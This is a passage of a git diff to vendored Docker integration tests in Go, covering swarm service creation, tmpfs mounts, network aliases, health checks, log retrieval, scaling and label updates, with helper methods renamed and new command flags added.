&& task.Status.ContainerStatus != nil, nil + }, checker.Equals, true) + + for _, target := range []string{"target1", "target2"} { + c.Assert(err, checker.IsNil, check.Commentf(out)) + path := filepath.Join("/", target) + out, err := d.Cmd("exec", task.Status.ContainerStatus.ContainerID, "cat", path) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Equals, "TESTINGDATA") + } + + out, err = d.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil, check.Commentf(out)) } func (s *DockerSwarmSuite) TestServiceCreateMountTmpfs(c *check.C) { d := s.AddDaemon(c, true, true) - out, err := d.Cmd("service", "create", "--mount", "type=tmpfs,target=/foo,tmpfs-size=1MB", "busybox", "sh", "-c", "mount | grep foo; tail -f /dev/null") + out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--mount", "type=tmpfs,target=/foo,tmpfs-size=1MB", "busybox", "sh", "-c", "mount | grep foo; tail -f /dev/null") c.Assert(err, checker.IsNil, check.Commentf(out)) id := strings.TrimSpace(out) var tasks []swarm.Task waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - tasks = d.getServiceTasks(c, id) + tasks = d.GetServiceTasks(c, id) return len(tasks) > 0, nil }, checker.Equals, true) task := tasks[0] waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - if task.NodeID == "" || task.Status.ContainerStatus.ContainerID == "" { - task = d.getTask(c, task.ID) + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) } - return task.NodeID != "" && task.Status.ContainerStatus.ContainerID != "", nil + return task.NodeID != "" && task.Status.ContainerStatus != nil, nil }, checker.Equals, true) // check container mount config @@ -173,3 +410,38 @@ func (s *DockerSwarmSuite) TestServiceCreateMountTmpfs(c *check.C) { c.Assert(strings.TrimSpace(out), checker.HasPrefix, "tmpfs on /foo type tmpfs") c.Assert(strings.TrimSpace(out), checker.Contains, "size=1024k") } + +func (s *DockerSwarmSuite) TestServiceCreateWithNetworkAlias(c *check.C) { + d := s.AddDaemon(c, true, true) + out, err := d.Cmd("network", "create", "--scope=swarm", "test_swarm_br") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--network=name=test_swarm_br,alias=srv_alias", "--name=alias_tst_container", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.GetServiceTasks(c, id) + return len(tasks) > 0, nil + }, checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus != nil, nil + }, checker.Equals, true) + + // check container alias config + out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .NetworkSettings.Networks.test_swarm_br.Aliases}}", task.Status.ContainerStatus.ContainerID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Make sure the only alias seen is the container-id + var aliases []string + c.Assert(json.Unmarshal([]byte(out), &aliases), checker.IsNil) + c.Assert(aliases, checker.HasLen, 1) + + c.Assert(task.Status.ContainerStatus.ContainerID, checker.Contains, aliases[0]) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go index 30580f6be3..ae9e7868bb 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go @@ -8,8 +8,11 @@ import ( "github.com/docker/docker/api/types/swarm" "github.com/docker/docker/daemon/cluster/executor/container" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "gotest.tools/icmd" ) // start a service, and then make its task unhealthy during running @@ -20,24 +23,23 @@ func (s *DockerSwarmSuite) TestServiceHealthRun(c *check.C) { d := s.AddDaemon(c, true, true) // build image with health-check - // note: use `daemon.buildImageWithOut` to build, do not use `buildImage` to build imageName := "testhealth" - _, _, err := d.buildImageWithOut(imageName, - `FROM busybox + result := cli.BuildCmd(c, imageName, cli.Daemon(d), + build.WithDockerfile(`FROM busybox RUN touch /status HEALTHCHECK --interval=1s --timeout=1s --retries=1\ - CMD cat /status`, - true) - c.Check(err, check.IsNil) + CMD cat /status`), + ) + result.Assert(c, icmd.Success) serviceName := "healthServiceRun" - out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top") + out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--name", serviceName, imageName, "top") c.Assert(err, checker.IsNil, check.Commentf(out)) id := strings.TrimSpace(out) var tasks []swarm.Task waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - tasks = d.getServiceTasks(c, id) + tasks = d.GetServiceTasks(c, id) return tasks, nil }, checker.HasLen, 1) @@ -45,7 +47,7 @@ func (s *DockerSwarmSuite) TestServiceHealthRun(c *check.C) { // wait for task to start waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - task = d.getTask(c, task.ID) + task = d.GetTask(c, task.ID) return task.Status.State, nil }, checker.Equals, swarm.TaskStateRunning) containerID := task.Status.ContainerStatus.ContainerID @@ -66,7 +68,7 @@ func (s *DockerSwarmSuite) TestServiceHealthRun(c *check.C) { // Task should be terminated waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - task = d.getTask(c, task.ID) + task = d.GetTask(c, task.ID) return task.Status.State, nil }, checker.Equals, swarm.TaskStateFailed) @@ -84,21 +86,21 @@ func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) { // service started from this image won't pass health check imageName := "testhealth" - _, _, err := d.buildImageWithOut(imageName, - `FROM busybox + result := cli.BuildCmd(c, imageName, cli.Daemon(d), + build.WithDockerfile(`FROM busybox HEALTHCHECK --interval=1s --timeout=1s --retries=1024\ - CMD cat /status`, - true) - c.Check(err, check.IsNil) + CMD cat /status`), + ) + result.Assert(c, icmd.Success) serviceName := "healthServiceStart" - out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top") + out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--name", serviceName, imageName, "top") c.Assert(err, checker.IsNil, check.Commentf(out)) id := strings.TrimSpace(out) var tasks []swarm.Task waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - tasks = d.getServiceTasks(c, id) + tasks = d.GetServiceTasks(c, id) return tasks, nil }, checker.HasLen, 1) @@ -106,7 +108,7 @@ func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) { // wait for task to start waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - task = d.getTask(c, task.ID) + task = d.GetTask(c, task.ID) return task.Status.State, nil }, checker.Equals, swarm.TaskStateStarting) @@ -120,7 +122,7 @@ func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) { }, checker.GreaterThan, 0) // task should be blocked at starting status - task = d.getTask(c, task.ID) + task = d.GetTask(c, task.ID) c.Assert(task.Status.State, check.Equals, swarm.TaskStateStarting) // make it healthy @@ -128,64 +130,7 @@ func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) { // Task should be at running status waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - task = d.getTask(c, task.ID) - return task.Status.State, nil - }, checker.Equals, swarm.TaskStateRunning) -} - -// start a service whose task is unhealthy at beginning -// its tasks should be blocked in starting stage, until health check is passed -func (s *DockerSwarmSuite) TestServiceHealthUpdate(c *check.C) { - testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows - - d := s.AddDaemon(c, true, true) - - // service started from this image won't pass health check - imageName := "testhealth" - _, _, err := d.buildImageWithOut(imageName, - `FROM busybox - HEALTHCHECK --interval=1s --timeout=1s --retries=1024\ - CMD cat /status`, - true) - c.Check(err, check.IsNil) - - serviceName := "healthServiceStart" - out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top") - c.Assert(err, checker.IsNil, check.Commentf(out)) - id := strings.TrimSpace(out) - - var tasks []swarm.Task - waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - tasks = d.getServiceTasks(c, id) - return tasks, nil - }, checker.HasLen, 1) - - task := tasks[0] - - // wait for task to start - waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - task = d.getTask(c, task.ID) - return task.Status.State, nil - }, checker.Equals, swarm.TaskStateStarting) - - containerID := task.Status.ContainerStatus.ContainerID - - // wait for health check to work - waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - out, _ := d.Cmd("inspect", "--format={{.State.Health.FailingStreak}}", containerID) - failingStreak, _ := strconv.Atoi(strings.TrimSpace(out)) - return failingStreak, nil - }, checker.GreaterThan, 0) - - // task should be blocked at starting status - task = d.getTask(c, task.ID) - c.Assert(task.Status.State, check.Equals, swarm.TaskStateStarting) - - // make it healthy - d.Cmd("exec", containerID, "touch", "/status") - // Task should be at running status - waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - task = d.getTask(c, task.ID) + task = d.GetTask(c, task.ID) return task.Status.State, nil }, checker.Equals, swarm.TaskStateRunning) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go deleted file mode 100644 index c2216543d7..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go +++ /dev/null @@ -1,96 +0,0 @@ -// +build !windows - -package main - -import ( - "bufio" - "fmt" - "io" - "os/exec" - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -type logMessage struct { - err error - data []byte -} - -func (s *DockerSwarmSuite) TestServiceLogs(c *check.C) { - testRequires(c, ExperimentalDaemon) - - d := s.AddDaemon(c, true, true) - - // we have multiple services here for detecting the goroutine issue #28915 - services := map[string]string{ - "TestServiceLogs1": "hello1", - "TestServiceLogs2": "hello2", - } - - for name, message := range services { - out, err := d.Cmd("service", "create", "--name", name, "busybox", - "sh", "-c", fmt.Sprintf("echo %s; tail -f /dev/null", message)) - c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - } - - // make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, - d.checkActiveContainerCount, checker.Equals, len(services)) - - for name, message := range services { - out, err := d.Cmd("service", "logs", name) - c.Assert(err, checker.IsNil) - c.Logf("log for %q: %q", name, out) - c.Assert(out, checker.Contains, message) - } -} - -func (s *DockerSwarmSuite) TestServiceLogsFollow(c *check.C) { - testRequires(c, ExperimentalDaemon) - - d := s.AddDaemon(c, true, true) - - name := "TestServiceLogsFollow" - - out, err := d.Cmd("service", "create", "--name", name, "busybox", "sh", "-c", "while true; do echo log test; sleep 0.1; done") - c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - - // make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) - - args := []string{"service", "logs", "-f", name} - cmd := exec.Command(dockerBinary, d.prependHostArg(args)...) - r, w := io.Pipe() - cmd.Stdout = w - cmd.Stderr = w - c.Assert(cmd.Start(), checker.IsNil) - - // Make sure pipe is written to - ch := make(chan *logMessage) - done := make(chan struct{}) - go func() { - reader := bufio.NewReader(r) - for { - msg := &logMessage{} - msg.data, _, msg.err = reader.ReadLine() - select { - case ch <- msg: - case <-done: - return - } - } - }() - - for i := 0; i < 3; i++ { - msg := <-ch - c.Assert(msg.err, checker.IsNil) - c.Assert(string(msg.data), checker.Contains, "log test") - } - close(done) - - c.Assert(cmd.Process.Kill(), checker.IsNil) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_test.go new file mode 100644 index 0000000000..ba337491b1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_test.go @@ -0,0 +1,388 @@ +// +build !windows + +package main + +import ( + "bufio" + "fmt" + "io" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/daemon" + "github.com/go-check/check" + "gotest.tools/icmd" +) + +type logMessage struct { + err error + data []byte +} + +func (s *DockerSwarmSuite) TestServiceLogs(c *check.C) { + d := s.AddDaemon(c, true, true) + + // we have multiple services here for detecting the goroutine issue #28915 + services := map[string]string{ + "TestServiceLogs1": "hello1", + "TestServiceLogs2": "hello2", + } + + for name, message := range services { + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", + "sh", "-c", fmt.Sprintf("echo %s; tail -f /dev/null", message)) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + } + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, + d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{"busybox:latest": len(services)}) + + for name, message := range services { + out, err := d.Cmd("service", "logs", name) + c.Assert(err, checker.IsNil) + c.Logf("log for %q: %q", name, out) + c.Assert(out, checker.Contains, message) + } +} + +// countLogLines returns a closure that can be used with waitAndAssert to +// verify that a minimum number of expected container log messages have been +// output. +func countLogLines(d *daemon.Daemon, name string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + result := icmd.RunCmd(d.Command("service", "logs", "-t", "--raw", name)) + result.Assert(c, icmd.Expected{}) + // if this returns an emptystring, trying to split it later will return + // an array containing emptystring. a valid log line will NEVER be + // emptystring because we ask for the timestamp. + if result.Stdout() == "" { + return 0, check.Commentf("Empty stdout") + } + lines := strings.Split(strings.TrimSpace(result.Stdout()), "\n") + return len(lines), check.Commentf("output, %q", string(result.Stdout())) + } +} + +func (s *DockerSwarmSuite) TestServiceLogsCompleteness(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsCompleteness" + + // make a service that prints 6 lines + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", "for line in $(seq 0 5); do echo log test $line; done; sleep 100000") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + // and make sure we have all the log lines + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 6) + + out, err = d.Cmd("service", "logs", name) + c.Assert(err, checker.IsNil) + lines := strings.Split(strings.TrimSpace(out), "\n") + + // i have heard anecdotal reports that logs may come back from the engine + // mis-ordered. if this tests fails, consider the possibility that that + // might be occurring + for i, line := range lines { + c.Assert(line, checker.Contains, fmt.Sprintf("log test %v", i)) + } +} + +func (s *DockerSwarmSuite) TestServiceLogsTail(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsTail" + + // make a service that prints 6 lines + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", "for line in $(seq 1 6); do echo log test $line; done; sleep 100000") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 6) + + out, err = d.Cmd("service", "logs", "--tail=2", name) + c.Assert(err, checker.IsNil) + lines := strings.Split(strings.TrimSpace(out), "\n") + + for i, line := range lines { + // doing i+5 is hacky but not too fragile, it's good enough. if it flakes something else is wrong + c.Assert(line, checker.Contains, fmt.Sprintf("log test %v", i+5)) + } +} + +func (s *DockerSwarmSuite) TestServiceLogsSince(c *check.C) { + // See DockerSuite.TestLogsSince, which is where this comes from + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsSince" + + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", "for i in $(seq 1 3); do sleep .1; echo log$i; done; sleep 10000000") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + // wait a sec for the logs to come in + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 3) + + out, err = d.Cmd("service", "logs", "-t", name) + c.Assert(err, checker.IsNil) + + log2Line := strings.Split(strings.Split(out, "\n")[1], " ") + t, err := time.Parse(time.RFC3339Nano, log2Line[0]) // timestamp log2 is written + c.Assert(err, checker.IsNil) + u := t.Add(50 * time.Millisecond) // add .05s so log1 & log2 don't show up + since := u.Format(time.RFC3339Nano) + + out, err = d.Cmd("service", "logs", "-t", fmt.Sprintf("--since=%v", since), name) + c.Assert(err, checker.IsNil) + + unexpected := []string{"log1", "log2"} + expected := []string{"log3"} + for _, v := range unexpected { + c.Assert(out, checker.Not(checker.Contains), v, check.Commentf("unexpected log message returned, since=%v", u)) + } + for _, v := range expected { + c.Assert(out, checker.Contains, v, check.Commentf("expected log message %v, was not present, since=%v", u)) + } +} + +func (s *DockerSwarmSuite) TestServiceLogsFollow(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsFollow" + + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", "while true; do echo log test; sleep 0.1; done") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + + args := []string{"service", "logs", "-f", name} + cmd := exec.Command(dockerBinary, d.PrependHostArg(args)...) + r, w := io.Pipe() + cmd.Stdout = w + cmd.Stderr = w + c.Assert(cmd.Start(), checker.IsNil) + go cmd.Wait() + + // Make sure pipe is written to + ch := make(chan *logMessage) + done := make(chan struct{}) + go func() { + reader := bufio.NewReader(r) + for { + msg := &logMessage{} + msg.data, _, msg.err = reader.ReadLine() + select { + case ch <- msg: + case <-done: + return + } + } + }() + + for i := 0; i < 3; i++ { + msg := <-ch + c.Assert(msg.err, checker.IsNil) + c.Assert(string(msg.data), checker.Contains, "log test") + } + close(done) + + c.Assert(cmd.Process.Kill(), checker.IsNil) +} + +func (s *DockerSwarmSuite) TestServiceLogsTaskLogs(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServicelogsTaskLogs" + replicas := 2 + + result := icmd.RunCmd(d.Command( + // create a service with the name + "service", "create", "--detach", "--no-resolve-image", "--name", name, + // which has some number of replicas + fmt.Sprintf("--replicas=%v", replicas), + // which has this the task id as an environment variable templated in + "--env", "TASK={{.Task.ID}}", + // and runs this command to print exactly 6 logs lines + "busybox", "sh", "-c", "for line in $(seq 0 5); do echo $TASK log test $line; done; sleep 100000", + )) + result.Assert(c, icmd.Expected{}) + // ^^ verify that we get no error + // then verify that we have an id in stdout + id := strings.TrimSpace(result.Stdout()) + c.Assert(id, checker.Not(checker.Equals), "") + // so, right here, we're basically inspecting by id and returning only + // the ID. if they don't match, the service doesn't exist. + result = icmd.RunCmd(d.Command("service", "inspect", "--format=\"{{.ID}}\"", id)) + result.Assert(c, icmd.Expected{Out: id}) + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, replicas) + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 6*replicas) + + // get the task ids + result = icmd.RunCmd(d.Command("service", "ps", "-q", name)) + result.Assert(c, icmd.Expected{}) + // make sure we have two tasks + taskIDs := strings.Split(strings.TrimSpace(result.Stdout()), "\n") + c.Assert(taskIDs, checker.HasLen, replicas) + + for _, taskID := range taskIDs { + c.Logf("checking task %v", taskID) + result := icmd.RunCmd(d.Command("service", "logs", taskID)) + result.Assert(c, icmd.Expected{}) + lines := strings.Split(strings.TrimSpace(result.Stdout()), "\n") + + c.Logf("checking messages for %v", taskID) + for i, line := range lines { + // make sure the message is in order + c.Assert(line, checker.Contains, fmt.Sprintf("log test %v", i)) + // make sure it contains the task id + c.Assert(line, checker.Contains, taskID) + } + } +} + +func (s *DockerSwarmSuite) TestServiceLogsTTY(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsTTY" + + result := icmd.RunCmd(d.Command( + // create a service + "service", "create", "--detach", "--no-resolve-image", + // name it $name + "--name", name, + // use a TTY + "-t", + // busybox image, shell string + "busybox", "sh", "-c", + // echo to stdout and stderr + "echo out; (echo err 1>&2); sleep 10000", + )) + + result.Assert(c, icmd.Expected{}) + id := strings.TrimSpace(result.Stdout()) + c.Assert(id, checker.Not(checker.Equals), "") + // so, right here, we're basically inspecting by id and returning only + // the ID. if they don't match, the service doesn't exist. + result = icmd.RunCmd(d.Command("service", "inspect", "--format=\"{{.ID}}\"", id)) + result.Assert(c, icmd.Expected{Out: id}) + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + // and make sure we have all the log lines + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 2) + + cmd := d.Command("service", "logs", "--raw", name) + result = icmd.RunCmd(cmd) + // for some reason there is carriage return in the output. i think this is + // just expected. + result.Assert(c, icmd.Expected{Out: "out\r\nerr\r\n"}) +} + +func (s *DockerSwarmSuite) TestServiceLogsNoHangDeletedContainer(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsNoHangDeletedContainer" + + result := icmd.RunCmd(d.Command( + // create a service + "service", "create", "--detach", "--no-resolve-image", + // name it $name + "--name", name, + // busybox image, shell string + "busybox", "sh", "-c", + // echo to stdout and stderr + "while true; do echo line; sleep 2; done", + )) + + // confirm that the command succeeded + result.Assert(c, icmd.Expected{}) + // get the service id + id := strings.TrimSpace(result.Stdout()) + c.Assert(id, checker.Not(checker.Equals), "") + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + // and make sure we have all the log lines + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 2) + + // now find and nuke the container + result = icmd.RunCmd(d.Command("ps", "-q")) + containerID := strings.TrimSpace(result.Stdout()) + c.Assert(containerID, checker.Not(checker.Equals), "") + result = icmd.RunCmd(d.Command("stop", containerID)) + result.Assert(c, icmd.Expected{Out: containerID}) + result = icmd.RunCmd(d.Command("rm", containerID)) + result.Assert(c, icmd.Expected{Out: containerID}) + + // run logs. use tail 2 to make sure we don't try to get a bunch of logs + // somehow and slow down execution time + cmd := d.Command("service", "logs", "--tail", "2", id) + // start the command and then wait for it to finish with a 3 second timeout + result = icmd.StartCmd(cmd) + result = icmd.WaitOnCmd(3*time.Second, result) + + // then, assert that the result matches expected. if the command timed out, + // if the command is timed out, result.Timeout will be true, but the + // Expected defaults to false + result.Assert(c, icmd.Expected{}) +} + +func (s *DockerSwarmSuite) TestServiceLogsDetails(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsDetails" + + result := icmd.RunCmd(d.Command( + // create a service + "service", "create", "--detach", "--no-resolve-image", + // name it $name + "--name", name, + // add an environment variable + "--env", "asdf=test1", + // add a log driver (without explicitly setting a driver, log-opt doesn't work) + "--log-driver", "json-file", + // add a log option to print the environment variable + "--log-opt", "env=asdf", + // busybox image, shell string + "busybox", "sh", "-c", + // make a log line + "echo LogLine; while true; do sleep 1; done;", + )) + + result.Assert(c, icmd.Expected{}) + id := strings.TrimSpace(result.Stdout()) + c.Assert(id, checker.Not(checker.Equals), "") + + // make sure task has been deployed + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + // and make sure we have all the log lines + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 1) + + // First, test without pretty printing + // call service logs with details. set raw to skip pretty printing + result = icmd.RunCmd(d.Command("service", "logs", "--raw", "--details", name)) + // in this case, we should get details and we should get log message, but + // there will also be context as details (which will fall after the detail + // we inserted in alphabetical order + result.Assert(c, icmd.Expected{Out: "asdf=test1"}) + result.Assert(c, icmd.Expected{Out: "LogLine"}) + + // call service logs with details. this time, don't pass raw + result = icmd.RunCmd(d.Command("service", "logs", "--details", id)) + // in this case, we should get details space logmessage as well. the context + // is part of the pretty part of the logline + result.Assert(c, icmd.Expected{Out: "asdf=test1 LogLine"}) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go index 29cca2358d..41b49d64aa 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go @@ -6,7 +6,7 @@ import ( "fmt" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) @@ -14,11 +14,11 @@ func (s *DockerSwarmSuite) TestServiceScale(c *check.C) { d := s.AddDaemon(c, true, true) service1Name := "TestService1" - service1Args := append([]string{"service", "create", "--name", service1Name, defaultSleepImage}, sleepCommandForDaemonPlatform()...) + service1Args := append([]string{"service", "create", "--detach", "--no-resolve-image", "--name", service1Name, defaultSleepImage}, sleepCommandForDaemonPlatform()...) // global mode service2Name := "TestService2" - service2Args := append([]string{"service", "create", "--name", service2Name, "--mode=global", defaultSleepImage}, sleepCommandForDaemonPlatform()...) + service2Args := append([]string{"service", "create", "--detach", "--no-resolve-image", "--name", service2Name, "--mode=global", defaultSleepImage}, sleepCommandForDaemonPlatform()...) // Create services out, err := d.Cmd(service1Args...) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go index 837370ceeb..a281327afe 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go @@ -7,82 +7,47 @@ import ( "fmt" "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) -func (s *DockerSwarmSuite) TestServiceUpdatePort(c *check.C) { - d := s.AddDaemon(c, true, true) - - serviceName := "TestServiceUpdatePort" - serviceArgs := append([]string{"service", "create", "--name", serviceName, "-p", "8080:8081", defaultSleepImage}, sleepCommandForDaemonPlatform()...) - - // Create a service with a port mapping of 8080:8081. - out, err := d.Cmd(serviceArgs...) - c.Assert(err, checker.IsNil) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) - - // Update the service: changed the port mapping from 8080:8081 to 8082:8083. - _, err = d.Cmd("service", "update", "--publish-add", "8082:8083", "--publish-rm", "8081", serviceName) - c.Assert(err, checker.IsNil) - - // Inspect the service and verify port mapping - expected := []swarm.PortConfig{ - { - Protocol: "tcp", - PublishedPort: 8082, - TargetPort: 8083, - PublishMode: "ingress", - }, - } - - out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.EndpointSpec.Ports }}", serviceName) - c.Assert(err, checker.IsNil) - - var portConfig []swarm.PortConfig - if err := json.Unmarshal([]byte(out), &portConfig); err != nil { - c.Fatalf("invalid JSON in inspect result: %v (%s)", err, out) - } - c.Assert(portConfig, checker.DeepEquals, expected) -} - func (s *DockerSwarmSuite) TestServiceUpdateLabel(c *check.C) { d := s.AddDaemon(c, true, true) - out, err := d.Cmd("service", "create", "--name=test", "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name=test", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) - service := d.getService(c, "test") + service := d.GetService(c, "test") c.Assert(service.Spec.Labels, checker.HasLen, 0) // add label to empty set - out, err = d.Cmd("service", "update", "test", "--label-add", "foo=bar") + out, err = d.Cmd("service", "update", "--detach", "test", "--label-add", "foo=bar") c.Assert(err, checker.IsNil, check.Commentf(out)) - service = d.getService(c, "test") + service = d.GetService(c, "test") c.Assert(service.Spec.Labels, checker.HasLen, 1) c.Assert(service.Spec.Labels["foo"], checker.Equals, "bar") // add label to non-empty set - out, err = d.Cmd("service", "update", "test", "--label-add", "foo2=bar") + out, err = d.Cmd("service", "update", "--detach", "test", "--label-add", "foo2=bar") c.Assert(err, checker.IsNil, check.Commentf(out)) - service = d.getService(c, "test") + service = d.GetService(c, "test") c.Assert(service.Spec.Labels, checker.HasLen, 2) c.Assert(service.Spec.Labels["foo2"], checker.Equals, "bar") - out, err = d.Cmd("service", "update", "test", "--label-rm", "foo2") + out, err = d.Cmd("service", "update", "--detach", "test", "--label-rm", "foo2") c.Assert(err, checker.IsNil, check.Commentf(out)) - service = d.getService(c, "test") + service = d.GetService(c, "test") c.Assert(service.Spec.Labels, checker.HasLen, 1) c.Assert(service.Spec.Labels["foo2"], checker.Equals, "") - out, err = d.Cmd("service", "update", "test", "--label-rm", "foo") + out, err = d.Cmd("service", "update", "--detach", 